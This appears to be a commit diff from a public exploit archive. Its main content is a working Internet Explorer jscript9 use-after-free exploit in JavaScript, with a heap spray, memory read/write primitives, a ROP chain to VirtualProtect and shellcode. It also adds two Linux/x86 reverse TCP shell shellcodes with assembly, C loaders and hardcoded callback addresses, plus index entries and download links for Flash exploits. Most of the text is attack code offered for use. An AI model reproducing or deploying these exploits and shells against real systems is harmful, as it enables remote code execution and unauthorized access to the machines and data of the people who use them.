first_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];
stackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];
first_gadget = [0x89, 0x41, 0x0c, 0xc3];
stackpivot_gadget = [0x94, 0xc3];
gadget_offsets = {"stackpivot": 0, "g1": 0, "g2": 0};
function empty_replacer(a,b) {
return b;
}
function create_list(lst, depth) {
if (depth > 5)
{
return;
}
else
{
// Creates 19 objects in each nested list
for (i = 0; i <= 19; i++)
{
// Create random string with length 8
for (var val = "", c = 0; c <= 8; c++) {
rnd = Math.floor((Math.random() * 90) + 48);
l = String.fromCharCode(rnd);
val = val + l;
}
lst["a" + i] = val;
}
create_list(lst["a0"] = {}, depth + 1);
}
}
function create_triggering_json() {
var lst = {}
create_list(lst, 0);
return lst;
}
// Create vulnerable JSON
trig_json = create_triggering_json();
spray = new Array(4096);
buff = new ArrayBuffer(4);
size = 0;
// Heap Spray
var I = setInterval(function(){
for (i=0;i<400;i++,size++) {
spray[size] = new Array(15352);
for (j = 0; j< 85;j++) {
spray[size][j] = new Uint32Array(buff);
}
0 == i && (yb = spray[0][0]["length"], yb["toString"](16))
}
size >= (4096) && (clearInterval(I), uaf())
}, 100);
var arr = []
function uaf()
{
JSON.stringify(trig_json,empty_replacer);
var pattern = [311357464,311357472,311357464];
for (var b = 3248 * 2, c = 203; c < b; c++)
arr[c] = new ArrayBuffer(12);
for (c = 203; c < b; c++)
{
var data = new Uint32Array(arr[c],0);
a = 0;
for (var i = data["length"] / pattern["length"]; a < i; a++)
for (var d=0, e = pattern["length"]; d < e;d++)
data[a+d] = pattern[d];
}
CollectGarbage();
search_corrupted_array();
}
var damaged_array;
function search_corrupted_array()
{
for (i=0;i<4096;i++)
{
for (j = 0; j< 85;j++) {
if (spray[i][j].length != 1)
{
damaged_array = spray[i][j];
damaged_array[1] = 0x7fffffff; // Set array to include almost entire user-space
damaged_array[2] = 0x10000;
write_dword_to_addr(damaged_array, 0x128e0020, 0xDEC0DE * 2 | 1); // Mark the first element of one of the arrays, to find it later
for (k = 0; k < 4096; k++) { // find the marked array
if (spray[k][0] == 0xDEC0DE) {
break;
}
}
// now spray[k][0] is 0x128e0020
if (k == 4096) break;
spray[k][2] = new Array(1); // creates a native integer array, pointed by 0x128e0028
spray[k][2][0] = new ArrayBuffer(0xc); // turns the array to be JavascriptArray
arr_obj = read_dword_from_addr(damaged_array, 0x128e0028); // address of the new JavascriptArray object
jscript9_base_addr = read_dword_from_addr(damaged_array, arr_obj) & 0xffff0000; // read the first dword of the JavascriptArray object, which is the vftable pointer, null the lower word to get jscript9 base address
vp_addr = get_vp_addr(damaged_array, jscript9_base_addr); // virtual address of kernel32!VirtualProtectStub
if (vp_addr == 0) break;
arrbuf = new ArrayBuffer(0x5000); // this buffer will contain the ROP chain
spray[k][0] = new Uint32Array(arrbuf); // Uint32Array that is a view to the arraybuffer above, pointed by 0x128e0020
rc_buf_ui32_obj = read_dword_from_addr(damaged_array, 0x128e0020); // address of the Uint32Array object
rc_buf_ui32_data = read_dword_from_addr(damaged_array, rc_buf_ui32_obj + 0x20); // address of first element of Uint32Array above
var shellcode_caller = [0x53, 0x55, 0x56, 0xe8, 0x09, 0x00, 0x00, 0x00, 0x5e, 0x5d, 0x5b, 0x8b, 0x63, 0x0c, 0xc2, 0x0c, 0x00, 0x90];
var shellcode = [96, 49, 210, 82, 104, 99, 97, 108, 99, 84, 89, 82, 81, 100, 139, 114, 48, 139, 118, 12, 139, 118, 12, 173, 139, 48, 139, 126, 24, 139, 95, 60, 139, 92, 31, 120, 139, 116, 31, 32, 1, 254, 139, 84, 31, 36, 15, 183, 44, 23, 66, 66, 173, 129, 60, 7, 87, 105, 110, 69, 117, 240, 139, 116, 31, 28, 1, 254, 3, 60, 174, 255, 215, 88, 88, 97, 195]; // open calc.exe shellcode
spray[k][1] = new Uint8Array(shellcode_caller.concat(shellcode)); // shellcode, pointed by 0x128e0024
sc_obj = read_dword_from_addr(damaged_array, 0x128e0024); // address of the Uint8Array object containing the shellcode
sc_data = read_dword_from_addr(damaged_array, sc_obj + 0x20); // address of the shellcode buffer itself
construct_gadget_dict(damaged_array, jscript9_base_addr);
// construct the ROP chain
spray[k][0][0] = jscript9_base_addr + gadget_offsets["g1"]; // mov dword ptr [ecx+0c], eax # ret
spray[k][0][1] = jscript9_base_addr + gadget_offsets["g2"]; // ret
spray[k][0][2] = vp_addr; // VirtualProtectStub pointer
spray[k][0][3] = sc_data; // shellcode address (return address to which we return after VirtualProtect)
spray[k][0][4] = sc_data; // lpAddress
spray[k][0][5] = spray[k][1].length; // dwSize
spray[k][0][6] = 0x40; // flNewProtect = PAGE_EXECUTE_READWRITE
spray[k][0][7] = rc_buf_ui32_data + 0x20; // lpflOldProtect
spray[k][0][0x90 / 4] = jscript9_base_addr + gadget_offsets["stackpivot"]; // stackpivot gadget in offset 0x90 from ROP chain top
write_dword_to_addr(damaged_array, arr_obj, rc_buf_ui32_data); // overwrite the JavascriptArray object's vftable pointer with the address of the ROP chain
spray[k][2][0] = 0; // set the first item of the overwritten JavascriptArray object, triggering the call to JavascriptArray::SetItem. since the vftable is now the ROP chain, and SetItem is in offset 0x90 in the original vftable, this will trigger the stackpivot gadget
}
}
}
}
function get_index_from_addr(addr) {
return Math.floor((addr - 0x10000) / 4);
}
function get_iat_offset(arr, js9_base) {
return 0x3e6000;
}
function get_pe_header_offset(arr, js9_base) {
var offset = read_dword_from_addr(arr, js9_base + 0x3c);
return offset;
}
function get_import_table_offset(arr, js9_base) {
var pe_header_offset = get_pe_header_offset(arr, js9_base);
var pe_header = js9_base + pe_header_offset;
var import_table_offset = read_dword_from_addr(arr, pe_header + 0x80);
return import_table_offset;
}
function get_import_table_size(arr, js9_base) {
var pe_header_offset = get_pe_header_offset(arr, js9_base);
var pe_header = js9_base + pe_header_offset;
var import_table_size = read_dword_from_addr(arr, pe_header + 0x84);
return import_table_size;
}
function get_vp_addr(arr, js9_base) {
var kernel32_entry = get_kernel32_entry(arr, js9_base);
var string_pointers_offset = read_dword_from_addr(arr, kernel32_entry - 0xc);
var function_pointers_offset = read_dword_from_addr(arr, kernel32_entry + 0x4);
var func_name = new String();
for (fptr = js9_base + function_pointers_offset, sptr = js9_base + string_pointers_offset; fptr != 0 && sptr != 0; fptr += 4, sptr += 4) {
func_name = read_string_from_addr(arr, js9_base + read_dword_from_addr(arr, sptr) +2);
if (func_name.indexOf("VirtualProtect") > -1) {
return read_dword_from_addr(arr, fptr);
}
}
return 0;
}
function get_kernel32_entry(arr, js9_base) {
var it_addr = js9_base + get_import_table_offset(arr, js9_base);
var it_size = get_import_table_size(arr, js9_base);
var s = new String();
for (var next_addr = it_addr + 0xc; next_addr < js9_base + it_addr + it_size; next_addr += 0x14) {
var it_entry = read_dword_from_addr(arr, next_addr);
if (it_entry != 0) {
s = read_string_from_addr(arr, js9_base + it_entry);
if (s.indexOf("KERNEL32") > -1 || s.indexOf("kernel32") > -1) {
return next_addr;
}
}
}
return 0;
}
function read_dword_from_addr(arr, addr) {
return arr[get_index_from_addr(addr)];
}
function read_byte_from_addr(arr, addr) {
var mod = addr % 4;
var ui32 = read_dword_from_addr(arr, addr);
return ((ui32 >> (mod * 8)) & 0x000000ff);
}
function read_string_from_addr(arr, addr) {
var s = new String();
var i = 0;
for (i = addr, c = "stub"; c != String.fromCharCode(0); i++) {
c = String.fromCharCode(read_byte_from_addr(arr, i));
s += c;
}
return s;
}
function write_dword_to_addr(arr, addr, data) {
arr[get_index_from_addr(addr)] = data;
}
function find_gadget_offset(arr, js9_base, offsets, gadget, gadget_key) {
var first_dword = 0x0, second_dword = 0x0, g = 0;
var gadget_candidate = [];
for (g = 0; g < offsets.length; g++) {
first_dword = read_dword_from_addr(arr, js9_base + offsets[g]);
second_dword = read_dword_from_addr(arr, js9_base + offsets[g] + 4);
gadget_candidate = convert_reverse_ui32_to_array(first_dword);
gadget_candidate = gadget_candidate.concat(convert_reverse_ui32_to_array(second_dword));
if (contains_gadget(gadget_candidate, gadget)) {
gadget_offsets[gadget_key] = offsets[g];
break;
}
}
}
function construct_gadget_dict(arr, js9_base) {
find_gadget_offset(arr, js9_base, first_gadget_offsets, first_gadget, "g1");
find_gadget_offset(arr, js9_base, stackpivot_gadget_offsets, stackpivot_gadget, "stackpivot");
if (gadget_offsets["stackpivot"] > 0) {
gadget_offsets["g2"] = gadget_offsets["stackpivot"] + 1;
}
}
function contains_gadget(arr, sub) {
var i = 0;
for (i = 0; i < sub.length; i++) {
if (arr.indexOf(sub[i]) == -1) return false;
}
return true;
}
function convert_reverse_ui32_to_array(ui32) {
var arr = [];
var i = 0;
var tmp = ui32;
for (i = 0; i < 4; i++, tmp = tmp >> 8) {
arr.push(tmp & 0x000000ff);
}
return arr;
}
</script>
</body>
</html>

5
exploits/windows/local/44744.txt Normal file
View file

@ -0,0 +1,5 @@
## CVE-2018-4878 (flash exploit)
Pop up a calculator - tested with installation of flash activeX plugin 28.0.0.137
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx

5
exploits/windows/local/44745.txt Normal file
View file

@ -0,0 +1,5 @@
## CVE-2018-4878
Pop up a calculator - Requires Flash ActiveX 28.0.0.137
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf

15
files_exploits.csv
View file

@ -9725,7 +9725,7 @@ id,file,description,date,author,type,platform,port
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware,
44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows,
44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
@ -9735,6 +9735,12 @@ id,file,description,date,author,type,platform,port
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows,
44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows,
44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39410,6 +39416,11 @@ id,file,description,date,author,type,platform,port
44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php,
44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php,
44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux,
44735,exploits/php/webapps/44735.txt,"NewsBee CMS 1.4 - Cross-Site Request Forgery",2018-05-23,indoushka,webapps,php,
44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware,
44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java,
44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -885,3 +885,5 @@ id,file,description,date,author,type,platform
44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86
44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86

1 id file description date author type platform
885 44609 shellcodes/linux_x86/44609.c Linux/x86 - Read /etc/passwd Shellcode (62 bytes) 2018-05-10 Nuno Freitas shellcode linux_x86
886 44620 shellcodes/linux_x86/44620.c Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes) 2018-05-14 Paolo Perego shellcode linux_x86
887 44723 shellcodes/linux_x86/44723.c Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes) 2018-05-23 Matteo Malvica shellcode linux_x86
888 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
889 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86

70
shellcodes/linux_x86/44738.c Normal file
View file

@ -0,0 +1,70 @@
/*
; Title : Linux/x86 - Reverse TCP Shell Shellcode (68 bytes)
; Date : May, 2018
; Author : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 68 bytes
; Tested on : i686 GNU/Linux
section .text
global _start
_start:
xor ecx, ecx
mul ecx
mov al, 0x66
push ebx
inc ebx
push ebx
push 0x2
mov ecx, esp
int 0x80
pop ecx
xchg eax, ebx
loop:
mov al, 0x3f
int 0x80
dec ecx
jns loop
mov al, 0x66
dec ebx
push 0x04020a0a ; IP
push word 0x5c11 ; Port
push bx
mov ecx,esp
push 0x10
push ecx
inc ebx
push ebx
mov ecx,esp
int 0x80
mov al, 0x0b
xor ecx, ecx
push ecx
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx, esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x59\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x4b\x68\x0a\x0a\x02\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x43\x53\x89\xe1\xcd\x80\xb0\x0b\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}

324
shellcodes/linux_x86/44740.c Normal file
View file

@ -0,0 +1,324 @@
/* Name : Jonathan "Chops" Crosby
* Email : me@securitychops.com
* Twitter : @securitychops
* Website : https://securitychops.com
* Blog Post : https://securitychops.com/2018/05/21/slae-assignment-2-reverse-shell-tcp-shellcode.html
* Student ID : SLAE-1250
* Assignment 2 : Reverse Shell TCP (Linux/x86)
* Shellcode Length : 101 bytes
* Shellcode Purpose: Initiate a reverse shell back to the ip address / port number on shellcode execution
*
* Assembly code to generate shellcode in provided C program:
; assemble/link assembly with:
; nasm -f elf32 -o shellcode.o shellcode.nasm
; ld -o shellcode shellcode.o
global _start
section .text
_start:
; for all socket based calls we will need to use socketcall
; http://man7.org/linux/man-pages/man2/socketcall.2.html
;
; the relevant calls we will need to make will be:
; -----
; SYS_SOCKET socket(2) 0x01
; SYS_BIND bind(2) 0x02
; SYS_CONNECT connect(2) 0x03
; SYS_LISTEN listen(2) 0x04
; SYS_ACCEPT accept(2) 0x05
; -----
; due to the way the registers need to be loaded up we will need to
; make the call to cocketcall by loading the following info into
; the following registers
; -----
; eax : 0x66 (this is the value of socketcall)
; ebx : SYS_* value (0x01, etc)
; ecx : pointer to address on stack of parameters to subfunction
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; C version : int socket(domain, type , protocol)
; ASM version: socketcall(SYS_SOCKET, socket(AF_INET,SOCK_STREAM,IPPROTO_IP))
; Returns : socketid into eax
; -----
; Param Values:
; #define AF_INET 2 // Internet IP Protocol
; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
;
; #define SOCK_STREAM 1 // stream (connection) socket
; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
;
; #define IPPROTO_IP 0
; If the protocol argument is zero, the default protocol for this address family and type shall be used.
; http://pubs.opengroup.org/onlinepubs/009695399/functions/socket.html
; -----
; Registers before calling socketcall:
;
; /---eax---\ /---ebx---\ /--------ecx---------\
; | 0x66 | | 0x01 | | byte, byte, byte |
; \---------/ \---------/ | 0x02 0x01 0x00 |
; \--------------------/
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; push params to the stack last first
xor eax, eax ; zeroing out edx to set IPPROTO_IP to 0
push eax ; pushing IPPROTO_IP onto stack
push byte 0x01 ; pushing SOCK_STREAM onto stack
push byte 0x02 ; pushing AF_INET onto stack
mov ecx, esp ; moving address of parameter structure into ecx
xor eax, eax ; zeroing out eax
mov al, 0x66 ; moving socketcall value into eax
xor ebx, ebx ; zeroing out ebx
mov bl, 0x01 ; moving SYS_SOCKET into ebx
int 0x80 ; calling interupt which triggers socketcall
; registers after calling socktcall
; /----eax----\ /---ebx---\ /--------ecx---------\
; | socketid | | 0x01 | | *address to struct |
; \------------/ \---------/ \---------------------/
; eax now contains our socketid, since eax is volitale
; lets put it somewhere safe, like esi
xchg eax, esi ; esi now contains our socketid
; and eax contains whatever was in esi
; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\
; | garbage | | 0x01 | | *address to struct | | socketid |
; \------------/ \---------/ \---------------------/ \---------/
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; C version : connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));
; ASM version: socketcall(SYS_CONNECT, connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));
; -----
; Param Values:
; socketid // currently stored in esi
;
; &serverAddress // memory on the stack for sockaddr
; * http://pubs.opengroup.org/onlinepubs/7908799/xns/netinetin.h.html
; * Values of this type must be cast to struct sockaddr for use with the socket interfaces
;
; this parameter is a struct of sockaddr_in which has the following structure
;
; struct sockaddr_in {
; sa_family_t sin_family; // address family: AF_INET
; in_port_t sin_port; // port in network byte order
; struct in_addr sin_addr; // internet address
; // Internet address.
; struct in_addr {
; uint32_t s_addr; // address in network byte order
; };
;
; sa_family_t
; #define AF_INET 2 // Internet IP Protocol
; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
;
; in_port_t // port in network byte order / big endian
; https://en.wikipedia.org/wiki/Endianness
; port 9876 would be: word 0x2694
;
; sin_addr // uint32_t ia 4 bytes
; ip bound to will be XXX.XXX.XXX.XXX
; ip would be: dword 0xFFFF or whatever IP will end up being reversed
;
; sizeof(serverAddress) // this value represents bytes, so 4 bytes is 32bits
; the value here is 16 bytes or 0x10h which is ultimaly 32bits
; -----
;
; Registers before calling socketcall:
;
; /---eax---\ /---ebx---\ /--------------------------ecx-----------------------------\
; | 0x66 | | 0x03 | | socketid, mem of server address struct, size of struct |
; \---------/ \---------/ | esi ecx 0x10 |
; \-------------------------|--------------------------------/
; we need to create the first stack pointer for sockaddr_in
xor edx, edx
push edx
mov byte [esp] , 0x0a ; 10
mov byte [esp+2], 0x07 ; 07
mov byte [esp+3], 0x11 ; 17
; mov byte [esp+1], 0x00 left out on purpose since
; this would put 0x00 in the final shellcode, which
; is generally considered bad practice since null
; tends to cause issues when executing
push word 0x5C11 ; port number (0x115C is 4444 so we push little endian)
push word 0x02 ; AF_INET - which is 0x02
mov ecx, esp ; move stack pointer to ecx
push byte 0x10 ; 16 byts long (or 32bit)
push ecx ; pushing sockaddr_in into esp
push esi ; sockid already in esi, so pushing it
mov ecx, esp ; moving stack pointer to ecx
; from the previous call ebx is already 0x01
; lets increment it by one
inc ebx ; increasing ebx from 1 to 2
inc ebx ; and from 2 to 3
xor eax, eax ; zeroing out eax
mov al, 0x66 ; moving socketcall value into eax
int 0x80 ; calling interupt which triggers socketcall
; registers after calling socktcall
; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\
; | uneeded | | 0x03 | | *address to struct | | socketid |
; \------------/ \---------/ \---------------------/ \---------/
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; C version : int dup2(clientid, localDiscripToDuplicate);
; ASM version: standard syscall using same format as above
; -----
; Param Values:
; clientid // currently stored in eax
;
; localDiscripToDuplicate // 0, 1, 2 file descriptors to duplicate
; -----
; Registers before calling dup2:
;
; /---eax---\ /---ebx----\ /-------------ecx---------------\
; | 0x3f | | sockid | | file descriptor to dplicate |
; \---------/ \----------/ | 2, 1 adnd 0 |
; \-------------------------------/
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx, esi ; moving socketid from eax to ebx
; now we need a loop to run through for
; 0, 1 and 2
xor ecx, ecx ; zeroing out ecx
mov cl, 0x03 ; moving syscall for dup2
dupin:
xor eax, eax ; zeroing out eax
mov al, 0x3f ; setting syscall value for dup2
dec cl ; decreasing loop counter since we
; will need to deal with only 2, 1 and 0
int 0x80 ; syscall triggering listen
jnz dupin ; if the zero flag is not set then do it again
; registers after calling socktcall
;
; since we don't care about any return values
; we don't bother tracking register values
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; C version : int execve(const char *filename, char *const argv[], char *const envp[]);
; ASM version: standard syscall using same format as above
; -----
; Param Values:
; filename // path of elf32 to execute
;
; argv // standard argv, first param is full path to elf32 null terminated
;
; envp // any environmental specific things, null in our case
; -----
; Registers before calling execve:
;
; /---eax---\ /----------------ebx--------------------\ /-------------ecx---------------\
; | 0x0B | | stack address if //bin/sh,0x00000000 | | stack address to 0x00000000 |
; \---------/ \---------------------------------------/ \-------------------------------/
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; call execve in order to complete the local bind shell
; execve("/bin/sh", argv[], envp[]);
; argv needs to be Address of /bin/sh, 0x00000000
; this is because when you call something from bash, etc
; argv will contain the path of the executable within it
; before starting we look like:
; execve(NOT-SET-YET, NOT-SET-YET, NOT-SET-YET)
; First we need to get 0x00000000 into ebx somehow
; so lets zero out eax and push it to esp
xor eax, eax ; zeroing out eax to make it 0x00000000
push eax ; pushing 0x00000000 onto the stack (esp)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; esp now looks like: 0x00000000;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; pushing "//bin/sh" (8 bytes and reverses due to little endian)
push 0x68732f6e ; hs/n : 2f68732f into esp
push 0x69622f2f ; ib// : 6e69622f into esp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;esp now looks like: "//bin/sh,0x00000000";
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; since we have been pushing to the stack, we have been pushing to esp
; now we need to get "//bin/sh,0x00000000" into ebx since it is the first parameter for execve
; since esp contains exactly what we need we move it to ebx
mov ebx, esp ; moving the param to ebx
; ebx now contains "//bin/sh,0x00000000"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, NOT-SET-YET);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; now we need to get 0x00000000 into edx
push eax ; eax is still 0x00000000 so push it to esp
mov edx, esp ; we need to move a 0x00000000 into
; the third parameter in edx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, 0x00000000);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; the second parameter is needs to be "//bin/sh,0x00000000"
; which we can accomplish by moving ebx onto the stack
; and then moving esp into ecx since it will be on the stack
push ebx ; pushing "//bin/sh,0x00000000" back to the stack
mov ecx, esp ; moving the address of ebx (on the stack) to ecx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; now we look like: execve("//bin/sh,0x00000000", *"//bin/sh,0x00000000", 0x00000000);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; loading syscall execve
mov al, 0x0B ; syscall for execve is 11 dec / 0x0B hex
int 0x80
*/
#include<stdio.h>
#include<string.h>
//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
unsigned char code[] = \
"\x31\xc0\x50\x6a\x01\x6a\x02\x89\xe1\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xcd\x80\x96\x31\xd2\x52\xc6\x04\x24\x0a\xc6\x44\x24\x02\x07\xc6\x44\x24\x03\x11\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\x43\x31\xc0\xb0\x66\xcd\x80\x89\xf3\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}